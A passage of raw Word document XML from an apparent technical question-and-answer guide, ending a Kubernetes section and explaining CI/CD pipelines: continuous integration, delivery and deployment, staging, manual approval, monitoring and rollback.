          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ecosystem and Community Support:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes has a vast ecosystem and a strong open-source community. Numerous tools, extensions, and operators are available to extend its capabilities, making it easier to manage and scale complex applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A5038" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A20E2C" w14:textId="1DDE356C" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc178383359"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Describe the CI/CD pipeline and its role in automating the software development lifecycle.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="5E8FFDF1" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A CI/CD pipeline is a crucial component in modern software development that automates and streamlines the process of building, testing, and deploying code. CI/CD stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Continuous Integration (CI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Continuous Delivery/Deployment (CD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. The pipeline is a series of automated steps that facilitate the software development lifecycle (SDLC), ensuring that code changes are integrated, tested, and delivered quickly, reliably, and consistently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550DDCB8" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CI/CD Pipeline: Key Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD95457" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Continuous Integration (CI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F854AC0" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>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xml:space="preserve"> CI ensures that code changes from multiple developers are automatically integrated into a shared repository several times a day. The goal is to detect and fix integration issues early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791639E" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA78341" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Version Control:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Developers commit their code changes to a shared version control system (e.g., Git).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863532A" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automated Build:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A build server (e.g., Jenkins, CircleCI) automatically compiles the code, resolving dependencies and generating build artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757A6A84" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automated Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unit tests, integration tests, and other automated tests are run to ensure that the code behaves as expected. If any test fails, the pipeline is halted, and the developer is notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7455383F" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Continuous Delivery (CD):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045BB11E" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Continuous Delivery automates the delivery of code changes to a staging or production environment. In CD, the software is always in a deployable state, but the deployment itself may require manual approval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6727C" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2882EDCB" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Artifact Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The build artifacts are stored in an artifact repository (e.g., Nexus, Artifactory) and are ready for deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E94A0E" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Staging Deployment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application is automatically deployed to a staging environment where further tests, including user acceptance tests (UAT) and performance tests, may be run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCAD59A" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Manual Approval:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> After passing all tests, the deployment to production may require manual approval, ensuring human oversight before the final release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5971389B" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Continuous Deployment (CD):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67956CF8" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Continuous Deployment goes a step further by automating the deployment to production without the need for manual intervention. Every change that passes all stages of the pipeline is automatically released to customers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A825E0D" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F1182" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automated Production Deployment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> If all tests are successful, the software is deployed directly to the production environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F7A93" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring and Rollback:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Continuous monitoring is implemented to track the health of the application in production. If any issues arise, an automated rollback mechanism can revert the changes to a stable version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E24C8" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Role of CI/CD in Automating the Software Development Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255DC28" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automation of Repetitive Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EBB9A7" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CI/CD automates repetitive tasks such as building, testing, and deploying code. This reduces manual effort, minimizes errors, and allows developers to focus on writing code rather than managing builds or deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E34AD" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Faster Feedback and Iteration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6577B82C" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>By integrating and testing code frequently, CI/CD provides rapid feedback to developers, enabling them to detect and fix bugs early in the development process. This leads to faster iterations and higher code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE15C55" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistent and Reliable Deployments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9FF562" w14:textId="77777777" w:rsidR="00125794" w:rsidRPr="00DA2F32" w:rsidRDefault="00125794" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="623"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
